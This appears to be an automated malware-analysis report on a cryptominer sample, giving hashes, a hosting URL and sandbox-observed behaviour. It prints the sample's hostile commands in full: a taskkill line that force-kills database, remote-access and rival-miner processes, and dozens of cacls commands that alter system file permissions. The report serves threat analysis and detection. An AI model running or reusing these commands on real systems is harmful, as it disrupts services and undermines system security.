Infosec Binary Analisys B.Exe

Infosec Binary Analisys

b.exe

MalFamily: Miner MalScore: 100

File type: PE32 executable (GUI) Intel 80386, for MS Windows

File size: 297.61 KB (304750 bytes)

Compile time: 2018-09-30 20:01:44

MD5: 41b6655aa0e36a375b0f840595248c2c

SHA1: 2c3cdfd05356bb7955f5bf1f013e65f58d041cca

Import hash: 00be6e6c4f9e287672c8301b72bdabf3

Submitted: 2019-01-19 04:06:05

URL(s) file hosting http://78.142.29.110/b.exe

Antivirus Report

Report date Detection Ratio Permalink

2019-01-16 22:33:42 46/70

Import library

KERNEL32.dll gdiplus.dll

8 Behaviors detected by system signatures

Uses suspicious command line tools or Windows utilities

Page 1 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- command: taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe.exe /im win1ogins.exe.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe im ctfmonc.exe /im lsmose.exe /im svhost.exe - command: cacls "C:\Program Files\RemoteDesk\*.exe" /e /d everyone - command: cacls "C:\Program Files\RemoteDesk\*.exe" /e /d system - command: cacls "C:\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone - command: cacls "C:\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d system - command: cacls "C:\Program Files\autodesk\*.exe" /e /d everyone - command: cacls "C:\Program Files\autodesk\*.exe" /e /d system - command: cacls "C:\Program Files\anyDesk\*.exe" /e /d everyone - command: cacls "C:\Program Files\anyDesk\*.exe" /e /d system - command: cacls "C:\Program Files (x86)\RemoteDesk\*.exe" /e /d everyone - command: cacls "C:\Program Files (x86)\RemoteDesk\*.exe" /e /d system - command: cacls "C:\Program Files (x86)\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone - command: cacls "C:\Program Files (x86)\Microsoft SQL Server\110\Shared\*.exe" /e /d system - command: cacls "C:\Program Files (x86)\autodesk\*.exe" /e /d everyone - command: cacls "C:\Program Files (x86)\autodesk\*.exe" /e /d system - command: cacls "C:\Program Files (x86)\anydesk\*.exe" /e /d system - command: cacls "C:\Program Files (x86)\anydesk\*.exe" /e /d everyone - command: cacls C:\Windows\debug\WIA\*.exe /e /d everyone - command: cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone - command: cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone - command: cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system - command: cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone - command: cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d system - command: cacls C:\Users\Default\AppData\Roaming\Tempo /e /d system - command: cacls C:\Users\Default\AppData\Roaming\Tempo /e /d everyone - command: cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system - command: cacls C:\Users\asp\AppData\Roaming\*.exe /e /g everyone:f - command: cacls C:\Users\administrator\AppData\Roaming /e /g everyone:f - command: cacls C:\Users\asp\AppData\Local\Temp /e /g system:f - command: cacls C:\Users\asp\AppData\Local\Temp /e /g everyone:f - command: cacls C:\Users\administrator\AppData\Local\Temp /e /g system:f - command: cacls C:\Users\administrator\AppData\Local\Temp /e /g everyone:f - command: cacls C:\Users\Default\AppData\Local\Temp /e /g everyone:f - command: cacls C:\Users\Default\AppData\Roaming /e /g everyone:f - command: cacls C:\Users\Default\AppData\Roaming /e /g system:f - command: cacls C:\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f - command: cacls C:\Users\Default\AppData\Roaming\*.exe /e /g everyone:f - command: cacls C:\Users\Default\AppData\Roaming\*.exe /e /g system:f - command: cacls C:\SysData\install.exe /e /d system - command: cacls C:\Msupdate /e /d system - command: cacls C:\windows\xcecg /e /d system - command: cacls C:\windows\ccm /e /d system - command: cacls c:\windows\smss.exe /e /d system - command: cacls "C:\Program Files\Common Files\Services\*.exe" /e /d system - command: cacls C:\Windows\System32\a.exe /e /d system - command: cacls C:\Windows\security\*.exe /e /d system - command: cacls C:\Windows\security\*.exe /e /d everyone - command: cacls C:\Windows\Resources\*.exe /e /d system - command: cacls C:\Windows\Resources\*.exe /e /d everyone - command: cacls C:\Windows\Resources\Themes\*.exe /e /d system - command: cacls C:\Windows\Resources\Themes\*.exe /e /d everyone - command: cacls C:\WINDOWS\system\lsmsm.exe /e /d system - command: cacls C:\ProgramData\homegroup\*.exe /e /d system - command: cacls C:\ProgramData\diskdata\*.exe /e /d system - command: cacls "C:\Program Files\Microsoft Updates" /e /d system - command: cacls c:\windows\system32\servwdrv.dll /e /d system - command: cacls c:\windows\system32\servwdrv.dll /e /d everyone

Page 2 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- command: cacls c:\windows\system32\servwdrvx.dll /e /d system - command: cacls c:\windows\system32\servwdrvx.dll /e /d everyone - command: cacls c:\windows\system32\serwwdrv.dll /e /d system - command: cacls c:\windows\system32\serwwdrv.dll /e /d everyone - command: cacls c:\windows\svchost.exe /e /d system - command: cacls C:\ProgramData\WmiAppSrv\svchost.exe /e /d system - command: cacls C:\Windows\Help\taskhost.exe /e /d system - command: cacls C:\Windows\Web\wininit.exe /e /d system - command: cacls C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe /e /d system - command: cacls C:\Progra~1\Common~1\svshpst.exe /e /d system - command: cacls C:\Windows\fonts\system32\svchost.exe /e /d system - command: cacls C:\Windows\fonts\*.exe /e /d system - command: cacls C:\Windows\Fonts\Microsoft /e /d system - command: cacls "C:\WINDOWS\Temp\32p.zip \xc3\x81\xe2\x94\x80\xe2\x94\xb4\xe2\x94\x98\xe2\x95\xa9\xe2\x96\x92\xe2\x94\x80\xe2\x94\x90\xe 2\x94\xac\xe2\x95\x9d 1\*.*" /e /d system - command: cacls "C:\WINDOWS\fonts\*.exe" /e /d system - command: cacls c:\windows\taskmgrs.exe /e /d system - command: cacls C:\Windows\security\IIS /e /d system - command: cacls C:\Progra~1\Common~1\System\*.exe /e /d system - command: cacls C:\Progra~1\dll /e /d system - command: cacls C:\Windows\Fonts\*.exe /e /d system - command: cacls C:\Progra~1\Common~1\Services /e /d system - command: cacls C:\Progra~1\Common~1\SpeechEngines\*.exe /e /d system - command: cacls C:\Windows\Fonts\system32 /e /d system - command: cacls C:\Windows\SpeechsTracing /e /d system - command: cacls "C:\Program Files (x86)\Microsoft SvidiaTen" /e /d system - command: C:\Windows\system32\cacls.exe cacLS C:\Progra~1\Common~1\Micros~1\*.exe /e /d system - command: cacls C:\System /e /d system - command: cacls C:\windows\1 /e /d system - command: cacls c:\users\public\*.exe /e /d system - command: cacls "C:\Program Files\Common Files\conime.exe" /e /d system - command: cacls "C:\Program Files (x86)\Common Files\conime.exe" /e /d system - command: cacls C:\Progra~1\test\*.exe /e /d everyone - command: cacls C:\Windows\Fonts\help\*.exe /e /d system - command: cacls C:\Windows\web\*.exe /e /d system - command: cacls C:\ProgramData\diskdata /e /d system Detected script timer window indicative of sleep style evasion

- Window: WSH-Timer Dynamic (imported) function loading detected

- DynamicLoader: kernel32.dll/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: kernel32.dll/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: kernel32.dll/LCMapStringEx - DynamicLoader: kernel32.dll/SetDllDirectoryW - DynamicLoader: kernel32.dll/SetDefaultDllDirectories - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: ole32.dll/OleInitialize - DynamicLoader: CRYPTBASE.dll/SystemFunction036 - DynamicLoader: UXTheme.dll/ThemeInitApiHook - DynamicLoader: USER32.dll/IsProcessDPIAware - DynamicLoader: COMCTL32.dll/InitCommonControlsEx - DynamicLoader: kernel32.dll/IsProcessorFeaturePresent - DynamicLoader: USER32.dll/GetWindowInfo

Page 3 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- DynamicLoader: USER32.dll/GetAncestor - DynamicLoader: USER32.dll/GetMonitorInfoA - DynamicLoader: USER32.dll/EnumDisplayMonitors - DynamicLoader: USER32.dll/EnumDisplayDevicesA - DynamicLoader: GDI32.dll/ExtTextOutW - DynamicLoader: GDI32.dll/GdiIsMetaPrintDC - DynamicLoader: SHELL32.dll/SHGetMalloc - DynamicLoader: ole32.dll/CoGetMalloc - DynamicLoader: USER32.dll/LoadIconW - DynamicLoader: USER32.dll/LoadBitmapW - DynamicLoader: ole32.dll/CreateStreamOnHGlobal - DynamicLoader: WindowsCodecs.dll/DllGetClassObject - DynamicLoader: kernel32.dll/WerRegisterMemoryBlock - DynamicLoader: GDI32.dll/GetObjectW - DynamicLoader: USER32.dll/GetDC - DynamicLoader: GDI32.dll/GetDeviceCaps - DynamicLoader: USER32.dll/ReleaseDC - DynamicLoader: USER32.dll/DialogBoxParamW - DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled - DynamicLoader: COMCTL32.dll/RegisterClassNameW - DynamicLoader: UXTheme.dll/EnableThemeDialogTexture - DynamicLoader: COMCTL32.dll/RegisterClassNameW - DynamicLoader: UXTheme.dll/OpenThemeData - DynamicLoader: UXTheme.dll/IsThemePartDefined - DynamicLoader: UXTheme.dll/GetThemeMargins - DynamicLoader: UXTheme.dll/GetThemeBool - DynamicLoader: UXTheme.dll/GetThemeInt - DynamicLoader: COMCTL32.dll/RegisterClassNameW - DynamicLoader: COMCTL32.dll/HIMAGELIST_QueryInterface - DynamicLoader: COMCTL32.dll/DrawShadowText - DynamicLoader: COMCTL32.dll/DrawSizeBox - DynamicLoader: COMCTL32.dll/DrawScrollBar - DynamicLoader: COMCTL32.dll/SizeBoxHwnd - DynamicLoader: COMCTL32.dll/ScrollBar_MouseMove - DynamicLoader: COMCTL32.dll/ScrollBar_Menu - DynamicLoader: COMCTL32.dll/HandleScrollCmd - DynamicLoader: COMCTL32.dll/DetachScrollBars - DynamicLoader: COMCTL32.dll/AttachScrollBars - DynamicLoader: COMCTL32.dll/CCSetScrollInfo - DynamicLoader: COMCTL32.dll/CCGetScrollInfo - DynamicLoader: COMCTL32.dll/CCEnableScrollBar - DynamicLoader: COMCTL32.dll/QuerySystemGestureStatus - DynamicLoader: UXTheme.dll/ - DynamicLoader: UXTheme.dll/CloseThemeData - DynamicLoader: UXTheme.dll/SetWindowTheme - DynamicLoader: COMCTL32.dll/RegisterClassNameW - DynamicLoader: UXTheme.dll/GetThemeFont - DynamicLoader: UXTheme.dll/GetThemeColor - DynamicLoader: IMM32.DLL/ImmIsIME - DynamicLoader: COMCTL32.dll/RegisterClassNameW - DynamicLoader: USER32.dll/GetWindowRect - DynamicLoader: USER32.dll/GetClientRect - DynamicLoader: USER32.dll/GetWindowTextW - DynamicLoader: USER32.dll/SetWindowTextW - DynamicLoader: USER32.dll/GetSystemMetrics - DynamicLoader: USER32.dll/GetWindow - DynamicLoader: USER32.dll/SendMessageW - DynamicLoader: GDI32.dll/GetLayout - DynamicLoader: GDI32.dll/GdiRealizationInfo - DynamicLoader: GDI32.dll/FontIsLinked - DynamicLoader: ADVAPI32.dll/RegOpenKeyExW - DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW - DynamicLoader: GDI32.dll/GetTextFaceAliasW

Page 4 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- DynamicLoader: ADVAPI32.dll/RegEnumValueW - DynamicLoader: ADVAPI32.dll/RegCloseKey - DynamicLoader: ADVAPI32.dll/RegQueryValueExW - DynamicLoader: ADVAPI32.dll/RegQueryValueExW - DynamicLoader: GDI32.dll/GetFontAssocStatus - DynamicLoader: ADVAPI32.dll/RegQueryValueExA - DynamicLoader: ADVAPI32.dll/RegEnumKeyExW - DynamicLoader: GDI32.dll/GetTextFaceAliasW - DynamicLoader: GDI32.dll/GetTextExtentExPointWPri - DynamicLoader: GDI32.dll/GdiIsMetaPrintDC - DynamicLoader: USER32.dll/SendDlgItemMessageW - DynamicLoader: USER32.dll/GetDlgItem - DynamicLoader: USER32.dll/GetClassNameW - DynamicLoader: USER32.dll/FindWindowExW - DynamicLoader: SHLWAPI.dll/SHAutoComplete - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: COMCTL32.dll/ - DynamicLoader: COMCTL32.dll/ - DynamicLoader: COMCTL32.dll/ - DynamicLoader: COMCTL32.dll/ - DynamicLoader: ole32.dll/CLSIDFromString - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: UXTheme.dll/GetThemePartSize - DynamicLoader: UXTheme.dll/GetThemeTextExtent - DynamicLoader: COMCTL32.dll/RegisterClassNameW - DynamicLoader: COMCTL32.dll/ - DynamicLoader: USER32.dll/PeekMessageW - DynamicLoader: USER32.dll/GetMessageW - DynamicLoader: USER32.dll/TranslateMessage - DynamicLoader: USER32.dll/DispatchMessageW - DynamicLoader: ADVAPI32.dll/RegOpenKeyExW - DynamicLoader: USER32.dll/GetDlgItemTextW - DynamicLoader: USER32.dll/SetFocus - DynamicLoader: ole32.dll/CoInitializeEx - DynamicLoader: ole32.dll/CoUninitialize - DynamicLoader: ole32.dll/CoRegisterInitializeSpy - DynamicLoader: ole32.dll/CoRevokeInitializeSpy - DynamicLoader: USER32.dll/LoadStringW - DynamicLoader: USER32.dll/ShowWindow - DynamicLoader: ADVAPI32.dll/RegCreateKeyExW - DynamicLoader: ADVAPI32.dll/RegSetValueExW - DynamicLoader: ADVAPI32.dll/RegCloseKey - DynamicLoader: USER32.dll/SetDlgItemTextW - DynamicLoader: USER32.dll/GetWindowLongW - DynamicLoader: USER32.dll/SetWindowLongW - DynamicLoader: USER32.dll/CharUpperW - DynamicLoader: SHELL32.dll/ShellExecuteExW - DynamicLoader: ole32.dll/OleInitialize - DynamicLoader: ole32.dll/CreateBindCtx - DynamicLoader: ole32.dll/CoTaskMemAlloc - DynamicLoader: PROPSYS.dll/PSCreateMemoryPropertyStore - DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteDWORD - DynamicLoader: ole32.dll/CoGetApartmentType - DynamicLoader: ole32.dll/CoRegisterInitializeSpy - DynamicLoader: ole32.dll/CoTaskMemFree - DynamicLoader: COMCTL32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: ole32.dll/CoTaskMemAlloc - DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadDWORD - DynamicLoader: ole32.dll/StringFromGUID2 - DynamicLoader: COMCTL32.dll/ - DynamicLoader: ADVAPI32.dll/RegEnumKeyW

Page 5 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- DynamicLoader: OLEAUT32.dll/ - DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadBSTR - DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadStrAlloc - DynamicLoader: SHELL32.dll/ - DynamicLoader: ADVAPI32.dll/OpenThreadToken - DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor - DynamicLoader: ADVAPI32.dll/SetEntriesInAclW - DynamicLoader: ntmarta.dll/GetMartaExtensionInterface - DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl - DynamicLoader: ADVAPI32.dll/IsTextUnicode - DynamicLoader: COMCTL32.dll/ - DynamicLoader: COMCTL32.dll/ - DynamicLoader: COMCTL32.dll/ - DynamicLoader: COMCTL32.dll/ - DynamicLoader: ole32.dll/CoUninitialize - DynamicLoader: sechost.dll/ConvertSidToStringSidW - DynamicLoader: profapi.dll/ - DynamicLoader: PROPSYS.dll/ - DynamicLoader: ADVAPI32.dll/RegOpenKeyExW - DynamicLoader: ADVAPI32.dll/RegGetValueW - DynamicLoader: ADVAPI32.dll/RegCloseKey - DynamicLoader: ole32.dll/CoTaskMemRealloc - DynamicLoader: PROPSYS.dll/InitPropVariantFromStringAsVector - DynamicLoader: PROPSYS.dll/PSCoerceToCanonicalValue - DynamicLoader: PROPSYS.dll/PropVariantToStringAlloc - DynamicLoader: ole32.dll/PropVariantClear - DynamicLoader: ole32.dll/CoAllowSetForegroundWindow - DynamicLoader: kernel32.dll/InitializeSRWLock - DynamicLoader: kernel32.dll/AcquireSRWLockExclusive - DynamicLoader: kernel32.dll/AcquireSRWLockShared - DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive - DynamicLoader: kernel32.dll/ReleaseSRWLockShared - DynamicLoader: SHELL32.dll/SHGetFolderPathW - DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation - DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW - DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW - DynamicLoader: COMCTL32.dll/ - DynamicLoader: sfc.dll/SfcIsFileProtected - DynamicLoader: ntdll.dll/RtlDllShutdownInProgress - DynamicLoader: COMCTL32.dll/ - DynamicLoader: ole32.dll/OleUninitialize - DynamicLoader: ole32.dll/CoRevokeInitializeSpy - DynamicLoader: COMCTL32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: USER32.dll/EnableWindow - DynamicLoader: USER32.dll/EndDialog - DynamicLoader: COMCTL32.dll/ - DynamicLoader: GDI32.dll/DeleteObject - DynamicLoader: ole32.dll/OleUninitialize - DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids - DynamicLoader: COMCTL32.dll/ - DynamicLoader: CRYPTBASE.dll/SystemFunction036 - DynamicLoader: uxtheme.dll/ThemeInitApiHook - DynamicLoader: USER32.dll/IsProcessDPIAware - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: ADVAPI32.dll/LookupAccountSidW - DynamicLoader: sechost.dll/LookupAccountSidLocalW - DynamicLoader: kernel32.dll/HeapSetInformation - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid - DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled - DynamicLoader: ole32.dll/CoCreateInstance

Page 6 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel - DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel - DynamicLoader: ADVAPI32.dll/SaferCloseLevel - DynamicLoader: ole32.dll/CLSIDFromProgIDEx - DynamicLoader: ole32.dll/CoGetClassObject - DynamicLoader: WScript.exe/ - DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary - DynamicLoader: ADVAPI32.dll/RegOpenKeyW - DynamicLoader: ADVAPI32.dll/RegQueryValueW - DynamicLoader: SHELL32.dll/ShellExecuteExW - DynamicLoader: ole32.dll/OleInitialize - DynamicLoader: ole32.dll/CreateBindCtx - DynamicLoader: ole32.dll/CoTaskMemAlloc - DynamicLoader: PROPSYS.dll/PSCreateMemoryPropertyStore - DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteDWORD - DynamicLoader: ole32.dll/CoGetApartmentType - DynamicLoader: ole32.dll/CoRegisterInitializeSpy - DynamicLoader: ole32.dll/CoTaskMemFree - DynamicLoader: comctl32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: ole32.dll/CoTaskMemAlloc - DynamicLoader: ole32.dll/CoGetMalloc - DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadDWORD - DynamicLoader: comctl32.dll/ - DynamicLoader: ole32.dll/StringFromGUID2 - DynamicLoader: comctl32.dll/ - DynamicLoader: comctl32.dll/ - DynamicLoader: ADVAPI32.dll/RegEnumKeyW - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadBSTR - DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadStrAlloc - DynamicLoader: SHELL32.dll/ - DynamicLoader: ADVAPI32.dll/OpenThreadToken - DynamicLoader: ole32.dll/CoInitializeEx - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor - DynamicLoader: ADVAPI32.dll/SetEntriesInAclW - DynamicLoader: ntmarta.dll/GetMartaExtensionInterface - DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl - DynamicLoader: ADVAPI32.dll/IsTextUnicode - DynamicLoader: comctl32.dll/ - DynamicLoader: comctl32.dll/ - DynamicLoader: comctl32.dll/ - DynamicLoader: comctl32.dll/ - DynamicLoader: ole32.dll/CoUninitialize - DynamicLoader: sechost.dll/ConvertSidToStringSidW - DynamicLoader: profapi.dll/ - DynamicLoader: PROPSYS.dll/ - DynamicLoader: ADVAPI32.dll/RegOpenKeyExW - DynamicLoader: ADVAPI32.dll/RegGetValueW - DynamicLoader: ADVAPI32.dll/RegCloseKey - DynamicLoader: ole32.dll/CoTaskMemRealloc - DynamicLoader: PROPSYS.dll/InitPropVariantFromStringAsVector - DynamicLoader: PROPSYS.dll/PSCoerceToCanonicalValue - DynamicLoader: PROPSYS.dll/PropVariantToStringAlloc - DynamicLoader: ole32.dll/PropVariantClear - DynamicLoader: ole32.dll/CoAllowSetForegroundWindow - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: kernel32.dll/InitializeSRWLock - DynamicLoader: kernel32.dll/AcquireSRWLockExclusive - DynamicLoader: kernel32.dll/AcquireSRWLockShared - DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive - DynamicLoader: kernel32.dll/ReleaseSRWLockShared

Page 7 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- DynamicLoader: SHELL32.dll/SHGetFolderPathW - DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation - DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW - DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW - DynamicLoader: comctl32.dll/ - DynamicLoader: ntdll.dll/RtlDllShutdownInProgress - DynamicLoader: comctl32.dll/ - DynamicLoader: ole32.dll/OleUninitialize - DynamicLoader: ole32.dll/CoRevokeInitializeSpy - DynamicLoader: comctl32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids - DynamicLoader: comctl32.dll/ - DynamicLoader: kernel32.dll/SetThreadUILanguage - DynamicLoader: kernel32.dll/CopyFileExW - DynamicLoader: kernel32.dll/IsDebuggerPresent - DynamicLoader: kernel32.dll/SetConsoleInputExeNameW - DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel - DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel - DynamicLoader: ADVAPI32.dll/SaferCloseLevel - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: RPCRT4.dll/I_RpcSNCHOption - DynamicLoader: sechost.dll/OpenSCManagerW - DynamicLoader: sechost.dll/OpenServiceW - DynamicLoader: sechost.dll/CloseServiceHandle - DynamicLoader: CRYPTBASE.dll/SystemFunction036 - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: ADVAPI32.dll/LookupAccountSidW - DynamicLoader: sechost.dll/LookupAccountSidLocalW - DynamicLoader: Winsta.dll/WinStationFreeMemory - DynamicLoader: Winsta.dll/WinStationCloseServer - DynamicLoader: Winsta.dll/WinStationOpenServerW - DynamicLoader: Winsta.dll/WinStationFreeGAPMemory - DynamicLoader: Winsta.dll/WinStationGetAllProcesses - DynamicLoader: Winsta.dll/WinStationEnumerateProcesses - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI - DynamicLoader: VSSAPI.DLL/CreateWriter - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: ole32.dll/CoTaskMemFree - DynamicLoader: ole32.dll/CoTaskMemAlloc - DynamicLoader: ADVAPI32.dll/LookupAccountNameW - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: ADVAPI32.dll/LookupAccountSidW - DynamicLoader: samcli.dll/NetLocalGroupGetMembers - DynamicLoader: SAMLIB.dll/SamConnect - DynamicLoader: RPCRT4.dll/NdrClientCall3 - DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW - DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW - DynamicLoader: RPCRT4.dll/RpcStringFreeW - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: SAMLIB.dll/SamOpenDomain - DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain - DynamicLoader: SAMLIB.dll/SamOpenAlias - DynamicLoader: SAMLIB.dll/SamFreeMemory - DynamicLoader: SAMLIB.dll/SamCloseHandle - DynamicLoader: SAMLIB.dll/SamGetMembersInAlias - DynamicLoader: netutils.dll/NetApiBufferFree

Page 8 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

- DynamicLoader: ole32.dll/CoCreateGuid - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: ole32.dll/StringFromCLSID - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: PROPSYS.dll/VariantToPropVariant - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: authZ.dll/AuthzInitializeContextFromToken - DynamicLoader: authZ.dll/AuthzInitializeObjectAccessAuditEvent2 - DynamicLoader: authZ.dll/AuthzAccessCheck - DynamicLoader: authZ.dll/AuthzFreeAuditEvent - DynamicLoader: authZ.dll/AuthzFreeContext - DynamicLoader: authZ.dll/AuthzInitializeResourceManager - DynamicLoader: authZ.dll/AuthzFreeResourceManager - DynamicLoader: RPCRT4.dll/NdrClientCall3 - DynamicLoader: RPCRT4.dll/RpcBindingCreateW - DynamicLoader: RPCRT4.dll/RpcBindingBind - DynamicLoader: RPCRT4.dll/I_RpcMapWin32Status - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: ADVAPI32.dll/EventRegister - DynamicLoader: ADVAPI32.dll/EventUnregister - DynamicLoader: ADVAPI32.dll/EventWrite - DynamicLoader: ADVAPI32.dll/EventActivityIdControl - DynamicLoader: ADVAPI32.dll/EventWriteTransfer - DynamicLoader: ADVAPI32.dll/EventEnabled - DynamicLoader: kernel32.dll/RegCloseKey - DynamicLoader: kernel32.dll/RegSetValueExW - DynamicLoader: kernel32.dll/RegOpenKeyExW - DynamicLoader: kernel32.dll/RegQueryValueExW - DynamicLoader: kernel32.dll/RegCloseKey - DynamicLoader: wmisvc.dll/IsImproperShutdownDetected - DynamicLoader: Wevtapi.dll/EvtRender - DynamicLoader: Wevtapi.dll/EvtNext - DynamicLoader: Wevtapi.dll/EvtClose - DynamicLoader: Wevtapi.dll/EvtQuery - DynamicLoader: Wevtapi.dll/EvtCreateRenderContext - DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW - DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW - DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW - DynamicLoader: RPCRT4.dll/RpcBindingSetOption - DynamicLoader: RPCRT4.dll/RpcStringFreeW - DynamicLoader: RPCRT4.dll/NdrClientCall3 - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI - DynamicLoader: ole32.dll/CoCreateFreeThreadedMarshaler - DynamicLoader: ole32.dll/CoGetMarshalSizeMax - DynamicLoader: ole32.dll/CreateStreamOnHGlobal - DynamicLoader: ole32.dll/CoMarshalInterface - DynamicLoader: CRYPTSP.dll/CryptGenRandom - DynamicLoader: CRYPTSP.dll/CryptReleaseContext - DynamicLoader: KERNELBASE.dll/InitializeAcl - DynamicLoader: KERNELBASE.dll/AddAce - DynamicLoader: kernel32.dll/OpenProcessToken - DynamicLoader: KERNELBASE.dll/GetTokenInformation - DynamicLoader: KERNELBASE.dll/DuplicateTokenEx - DynamicLoader: KERNELBASE.dll/AdjustTokenPrivileges - DynamicLoader: kernel32.dll/SetThreadToken - DynamicLoader: KERNELBASE.dll/CheckTokenMembership - DynamicLoader: ole32.dll/CLSIDFromString - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: authZ.dll/AuthzInitializeContextFromToken - DynamicLoader: authZ.dll/AuthzInitializeResourceManager - DynamicLoader: authZ.dll/AuthzInitializeContextFromSid

Page 9 Date: 2021-09-25 18:50:51 Infosec Binary Analisys

